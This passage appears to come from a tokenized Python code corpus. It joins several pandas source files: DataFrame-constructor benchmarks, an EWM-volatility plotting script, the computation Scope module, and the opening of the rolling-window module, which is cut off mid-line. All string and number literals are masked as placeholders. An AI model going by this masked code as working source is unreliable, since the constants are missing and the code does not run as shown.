frame_ctor_dtindex_QuarterEndx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( QuarterEnd ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . 
idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_QuarterEndx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_QuarterEndx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( QuarterEnd ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_QuarterEndx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . 
start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Secondx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Second ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Secondx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Secondx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Second ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Secondx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . 
ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_WeekOfMonthx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( WeekOfMonth ( <NUM_LIT:1> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_WeekOfMonthx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_WeekOfMonthx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( WeekOfMonth ( <NUM_LIT:2> , ** { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . 
columns ] ) <EOL> def time_frame_ctor_dtindex_WeekOfMonthx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Weekx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( Week ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Weekx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_Weekx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . 
get_index_for_offset ( Week ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_Weekx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_YearBeginx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( YearBegin ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_YearBeginx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . 
start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_YearBeginx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( YearBegin ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_YearBeginx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_YearEndx1 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( YearEnd ( <NUM_LIT:1> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_YearEndx1 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . 
ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_dtindex_YearEndx2 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . idx = self . get_index_for_offset ( YearEnd ( <NUM_LIT:2> , ** { } ) ) <EOL> self . df = DataFrame ( np . random . randn ( len ( self . idx ) , <NUM_LIT:10> ) , index = self . idx ) <EOL> self . d = dict ( [ ( col , self . df [ col ] ) for col in self . df . columns ] ) <EOL> def time_frame_ctor_dtindex_YearEndx2 ( self ) : <EOL> DataFrame ( self . d ) <EOL> def get_period_count ( self , start_date , off ) : <EOL> self . ten_offsets_in_days = ( ( start_date + ( off * <NUM_LIT:10> ) ) - start_date ) . days <EOL> if ( self . ten_offsets_in_days == <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1000> <EOL> else : <EOL> return min ( ( <NUM_LIT:9> * ( ( Timestamp . max - start_date ) . days // self . ten_offsets_in_days ) ) , <NUM_LIT:1000> ) <EOL> def get_index_for_offset ( self , off ) : <EOL> self . start_date = Timestamp ( '<STR_LIT>' ) <EOL> return date_range ( self . start_date , periods = min ( <NUM_LIT:1000> , self . get_period_count ( self . start_date , off ) ) , freq = off ) <EOL> class frame_ctor_list_of_dict ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> ( N , K ) = ( <NUM_LIT> , <NUM_LIT:50> ) <EOL> self . index = tm . makeStringIndex ( N ) <EOL> self . columns = tm . makeStringIndex ( K ) <EOL> self . frame = DataFrame ( np . random . randn ( N , K ) , index = self . index , columns = self . columns ) <EOL> try : <EOL> self . data = self . frame . 
to_dict ( ) <EOL> except : <EOL> self . data = self . frame . toDict ( ) <EOL> self . some_dict = self . data . values ( ) [ <NUM_LIT:0> ] <EOL> self . dict_list = [ dict ( zip ( self . columns , row ) ) for row in self . frame . values ] <EOL> def time_frame_ctor_list_of_dict ( self ) : <EOL> DataFrame ( self . dict_list ) <EOL> class frame_ctor_nested_dict ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> ( N , K ) = ( <NUM_LIT> , <NUM_LIT:50> ) <EOL> self . index = tm . makeStringIndex ( N ) <EOL> self . columns = tm . makeStringIndex ( K ) <EOL> self . frame = DataFrame ( np . random . randn ( N , K ) , index = self . index , columns = self . columns ) <EOL> try : <EOL> self . data = self . frame . to_dict ( ) <EOL> except : <EOL> self . data = self . frame . toDict ( ) <EOL> self . some_dict = self . data . values ( ) [ <NUM_LIT:0> ] <EOL> self . dict_list = [ dict ( zip ( self . columns , row ) ) for row in self . frame . values ] <EOL> def time_frame_ctor_nested_dict ( self ) : <EOL> DataFrame ( self . data ) <EOL> class frame_ctor_nested_dict_int64 ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . data = dict ( ( ( i , dict ( ( ( j , float ( j ) ) for j in range ( <NUM_LIT:100> ) ) ) ) for i in xrange ( <NUM_LIT> ) ) ) <EOL> def time_frame_ctor_nested_dict_int64 ( self ) : <EOL> DataFrame ( self . data ) <EOL> class frame_from_series ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . mi = MultiIndex . from_tuples ( [ ( x , y ) for x in range ( <NUM_LIT:100> ) for y in range ( <NUM_LIT:100> ) ] ) <EOL> self . s = Series ( randn ( <NUM_LIT> ) , index = self . mi ) <EOL> def time_frame_from_series ( self ) : <EOL> DataFrame ( self . s ) <EOL> class frame_get_numeric_data ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> self . df = DataFrame ( randn ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . df [ '<STR_LIT:foo>' ] = '<STR_LIT:bar>' <EOL> self . 
df [ '<STR_LIT:bar>' ] = '<STR_LIT>' <EOL> self . df = self . df . consolidate ( ) <EOL> def time_frame_get_numeric_data ( self ) : <EOL> self . df . _get_numeric_data ( ) <EOL> class series_ctor_from_dict ( object ) : <EOL> goal_time = <NUM_LIT> <EOL> def setup ( self ) : <EOL> ( N , K ) = ( <NUM_LIT> , <NUM_LIT:50> ) <EOL> self . index = tm . makeStringIndex ( N ) <EOL> self . columns = tm . makeStringIndex ( K ) <EOL> self . frame = DataFrame ( np . random . randn ( N , K ) , index = self . index , columns = self . columns ) <EOL> try : <EOL> self . data = self . frame . to_dict ( ) <EOL> except : <EOL> self . data = self . frame . toDict ( ) <EOL> self . some_dict = self . data . values ( ) [ <NUM_LIT:0> ] <EOL> self . dict_list = [ dict ( zip ( self . columns , row ) ) for row in self . frame . values ] <EOL> def time_series_ctor_from_dict ( self ) : <EOL> Series ( self . some_dict ) </s>
<s> import matplotlib . pyplot as plt <EOL> import pandas . util . testing as t <EOL> import pandas . stats . moments as m <EOL> t . N = <NUM_LIT> <EOL> ts = t . makeTimeSeries ( ) <EOL> ts [ : : <NUM_LIT:100> ] = <NUM_LIT:20> <EOL> s = ts . cumsum ( ) <EOL> plt . figure ( figsize = ( <NUM_LIT:10> , <NUM_LIT:5> ) ) <EOL> plt . plot ( s . index , m . ewmvol ( s , span = <NUM_LIT:50> , min_periods = <NUM_LIT:1> ) . values , color = '<STR_LIT:b>' ) <EOL> plt . plot ( s . index , m . rolling_std ( s , <NUM_LIT:50> , min_periods = <NUM_LIT:1> ) . values , color = '<STR_LIT:r>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . legend ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> f = plt . gcf ( ) <EOL> f . autofmt_xdate ( ) <EOL> plt . show ( ) <EOL> plt . close ( '<STR_LIT:all>' ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import struct <EOL> import inspect <EOL> import datetime <EOL> import itertools <EOL> import pprint <EOL> import numpy as np <EOL> import pandas as pd <EOL> from pandas . compat import DeepChainMap , map , StringIO <EOL> from pandas . core . base import StringMixin <EOL> import pandas . computation as compu <EOL> def _ensure_scope ( level , global_dict = None , local_dict = None , resolvers = ( ) , <EOL> target = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return Scope ( level + <NUM_LIT:1> , global_dict = global_dict , local_dict = local_dict , <EOL> resolvers = resolvers , target = target ) <EOL> def _replacer ( x ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> hexin = ord ( x ) <EOL> except TypeError : <EOL> hexin = x <EOL> return hex ( hexin ) <EOL> def _raw_hex_id ( obj ) : <EOL> """<STR_LIT>""" <EOL> packed = struct . pack ( '<STR_LIT>' , id ( obj ) ) <EOL> return '<STR_LIT>' . join ( map ( _replacer , packed ) ) <EOL> _DEFAULT_GLOBALS = { <EOL> '<STR_LIT>' : pd . lib . Timestamp , <EOL> '<STR_LIT>' : datetime . datetime , <EOL> '<STR_LIT:True>' : True , <EOL> '<STR_LIT:False>' : False , <EOL> '<STR_LIT:list>' : list , <EOL> '<STR_LIT>' : tuple , <EOL> '<STR_LIT>' : np . inf , <EOL> '<STR_LIT>' : np . inf , <EOL> } <EOL> def _get_pretty_string ( obj ) : <EOL> """<STR_LIT>""" <EOL> sio = StringIO ( ) <EOL> pprint . pprint ( obj , stream = sio ) <EOL> return sio . getvalue ( ) <EOL> class Scope ( StringMixin ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:target>' , '<STR_LIT>' <EOL> def __init__ ( self , level , global_dict = None , local_dict = None , resolvers = ( ) , <EOL> target = None ) : <EOL> self . level = level + <NUM_LIT:1> <EOL> self . scope = DeepChainMap ( _DEFAULT_GLOBALS . copy ( ) ) <EOL> self . target = target <EOL> if isinstance ( local_dict , Scope ) : <EOL> self . scope . update ( local_dict . scope ) <EOL> if local_dict . target is not None : <EOL> self . 
target = local_dict . target <EOL> self . update ( local_dict . level ) <EOL> frame = sys . _getframe ( self . level ) <EOL> try : <EOL> self . scope = self . scope . new_child ( ( global_dict or <EOL> frame . f_globals ) . copy ( ) ) <EOL> if not isinstance ( local_dict , Scope ) : <EOL> self . scope = self . scope . new_child ( ( local_dict or <EOL> frame . f_locals ) . copy ( ) ) <EOL> finally : <EOL> del frame <EOL> if isinstance ( local_dict , Scope ) : <EOL> resolvers += tuple ( local_dict . resolvers . maps ) <EOL> self . resolvers = DeepChainMap ( * resolvers ) <EOL> self . temps = { } <EOL> def __unicode__ ( self ) : <EOL> scope_keys = _get_pretty_string ( list ( self . scope . keys ( ) ) ) <EOL> res_keys = _get_pretty_string ( list ( self . resolvers . keys ( ) ) ) <EOL> return '<STR_LIT>' % ( type ( self ) . __name__ , scope_keys , <EOL> res_keys ) <EOL> @ property <EOL> def has_resolvers ( self ) : <EOL> """<STR_LIT>""" <EOL> return bool ( len ( self . resolvers ) ) <EOL> def resolve ( self , key , is_local ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if is_local : <EOL> return self . scope [ key ] <EOL> if self . has_resolvers : <EOL> return self . resolvers [ key ] <EOL> assert not is_local and not self . has_resolvers <EOL> return self . scope [ key ] <EOL> except KeyError : <EOL> try : <EOL> return self . temps [ key ] <EOL> except KeyError : <EOL> raise compu . ops . UndefinedVariableError ( key , is_local ) <EOL> def swapkey ( self , old_key , new_key , new_value = None ) : <EOL> """<STR_LIT>""" <EOL> if self . has_resolvers : <EOL> maps = self . resolvers . maps + self . scope . maps <EOL> else : <EOL> maps = self . scope . maps <EOL> maps . append ( self . temps ) <EOL> for mapping in maps : <EOL> if old_key in mapping : <EOL> mapping [ new_key ] = new_value <EOL> return <EOL> def _get_vars ( self , stack , scopes ) : <EOL> """<STR_LIT>""" <EOL> variables = itertools . 
product ( scopes , stack ) <EOL> for scope , ( frame , _ , _ , _ , _ , _ ) in variables : <EOL> try : <EOL> d = getattr ( frame , '<STR_LIT>' + scope ) <EOL> self . scope = self . scope . new_child ( d ) <EOL> finally : <EOL> del frame <EOL> def update ( self , level ) : <EOL> """<STR_LIT>""" <EOL> sl = level + <NUM_LIT:1> <EOL> stack = inspect . stack ( ) <EOL> try : <EOL> self . _get_vars ( stack [ : sl ] , scopes = [ '<STR_LIT>' ] ) <EOL> finally : <EOL> del stack [ : ] , stack <EOL> def add_tmp ( self , value ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' . format ( type ( value ) . __name__ , self . ntemps , <EOL> _raw_hex_id ( self ) ) <EOL> assert name not in self . temps <EOL> self . temps [ name ] = value <EOL> assert name in self . temps <EOL> return name <EOL> @ property <EOL> def ntemps ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . temps ) <EOL> @ property <EOL> def full_scope ( self ) : <EOL> """<STR_LIT>""" <EOL> maps = [ self . temps ] + self . resolvers . maps + self . scope . maps <EOL> return DeepChainMap ( * maps ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import warnings <EOL> import numpy as np <EOL> from collections import defaultdict <EOL> import pandas as pd <EOL> from pandas . lib import isscalar <EOL> from pandas . core . base import ( PandasObject , SelectionMixin , <EOL> GroupByMixin ) <EOL> import pandas . core . common as com <EOL> import pandas . algos as algos <EOL> from pandas import compat <EOL> from pandas . util . decorators import Substitution , Appender <EOL> from textwrap import dedent <EOL> _shared_docs = dict ( ) <EOL> _doc_template = """<STR_LIT>""" <EOL> class _Window ( PandasObject , SelectionMixin ) : <EOL> _attributes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> exclusions = set ( ) <EOL> def __init__ ( self , obj , window = None , min_periods = None , freq = None , <EOL> center = False , win_type = None , axis = <NUM_LIT:0> , ** kwargs ) : <EOL> if freq is not None : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , FutureWarning , stacklevel = <NUM_LIT:3> ) <EOL> self . blocks = [ ] <EOL> self . obj = obj <EOL> self . window = window <EOL> self . min_periods = min_periods <EOL> self . freq = freq <EOL> self . center = center <EOL> self . win_type = win_type <EOL> self . axis = obj . _get_axis_number ( axis ) if axis is not None else None <EOL> self . validate ( ) <EOL> @ property <EOL> def _constructor ( self ) : <EOL> return Window <EOL> def validate ( self ) : <EOL> if self . center is not None and not com . is_bool ( self . center ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if self . min_periods is not None and not com . is_integer ( self . min_periods ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def _convert_freq ( self , how = None ) : <EOL> """<STR_LIT>""" <EOL> obj = self . _selected_obj <EOL> if ( self . freq is not None and <EOL> isinstance ( obj , ( com . ABCSeries , com . 
ABCDataFrame ) ) ) : <EOL> if how is not None : <EOL> warnings . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , FutureWarning , <EOL> stacklevel = <NUM_LIT:6> ) <EOL> obj = obj . resample ( self . freq ) . aggregate ( how or '<STR_LIT>' ) <EOL> return obj <EOL> def _create_blocks ( self , how ) : <EOL> """<STR_LIT>""" <EOL> obj = self . _convert_freq ( how ) <EOL> return obj . as_blocks ( copy = False ) . values ( ) , obj <EOL> def _gotitem ( self , key , ndim , subset = None ) : <EOL> """<STR_LIT>""" <EOL> if subset is None : <EOL> subset = self . obj <EOL> self = self . _shallow_copy ( subset ) <EOL> self . _reset_cache ( ) <EOL> if subset . ndim == <NUM_LIT:2> : <EOL> if isscalar ( key ) and key in subset or com . is_list_like ( key ) : <EOL> self . _selection = key <EOL> return self <EOL> def __getattr__ ( self , attr ) : <EOL> if attr in self . _internal_names_set : <EOL> return object . __getattribute__ ( self , attr ) <EOL> if attr in self . obj : <EOL> return self [ attr ] <EOL> raise AttributeError ( "<STR_LIT>" % <EOL> ( type ( self ) . __name__ , attr ) ) <EOL> def _dir_additions ( self ) : <EOL> return self . obj . _dir_additions ( ) <EOL> def _get_window ( self , other = None ) : <EOL> return self . window <EOL> @ property <EOL> def _window_type ( self ) : <EOL> return self . __class__ . __name__ <EOL> def __unicode__ ( self ) : <EOL> """<STR_LIT>""" <EOL> attrs = [ "<STR_LIT>" . format ( k = k , v = getattr ( self , k ) ) <EOL> for k in self . _attributes <EOL> if getattr ( self , k , None ) is not None ] <EOL> return "<STR_LIT>" . format ( klass = self . _window_type , <EOL> attrs = '<STR_LIT:U+002C>' . join ( attrs ) ) <EOL> def _prep_values ( self , values = None , kill_inf = True , how = None ) : <EOL> if values is None : <EOL> values = getattr ( self . _selected_obj , '<STR_LIT>' , self . _selected_obj ) <EOL> if com . is_float_dtype ( values . dtype ) : <EOL> values = com . _ensure_float64 ( values ) <EOL> elif com . 
is_integer_dtype ( values . dtype ) : <EOL> values = com . _ensure_float64 ( values ) <EOL> elif com . needs_i8_conversion ( values . dtype ) : <EOL> raise NotImplementedError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> action = self . _window_type , <EOL> dtype = values . dtype ) ) <EOL> else : <EOL> try : <EOL> values = com . _ensure_float64 ( values ) <EOL> except ( ValueError , TypeError ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( values . dtype ) ) <EOL> if kill_inf : <EOL> values = values . copy ( ) <EOL> values [ np . isinf ( values ) ] = np . NaN <EOL> return values <EOL> def _wrap_result ( self , result , block = None , obj = None ) : <EOL> """<STR_LIT>""" <EOL> if obj is None : <EOL> obj = self . _selected_obj <EOL> index = obj . index <EOL> if isinstance ( result , np . ndarray ) : <EOL> if block is not None : <EOL> if com . is_timedelta64_dtype ( block . values . dtype ) : <EOL> result = pd . to_timedelta ( <EOL> result . ravel ( ) , unit = '<STR_LIT>' ) . values . reshape ( result . shape ) <EOL> if result . ndim == <NUM_LIT:1> : <EOL> from pandas import Series <EOL> return Series ( result , index , name = obj . name ) <EOL> return type ( obj ) ( result , index = index , columns = block . columns ) <EOL> return result <EOL> def _wrap_results ( self , results , blocks , obj ) : <EOL> """<STR_LIT>""" <EOL> final = [ ] <EOL> for result , block in zip ( results , blocks ) : <EOL> result = self . _wrap_result ( result , block = block , obj = obj ) <EOL> if result . ndim == <NUM_LIT:1> : <EOL> return result <EOL> final . append ( result ) <EOL> if not len ( final ) : <EOL> return obj . astype ( '<STR_LIT>' ) <EOL> return pd . concat ( final , axis = <NUM_LIT:1> ) . reindex ( columns = obj . columns ) <EOL> def _center_window ( self , result , window ) : <EOL> """<STR_LIT>""" <EOL> if self . axis > result . 
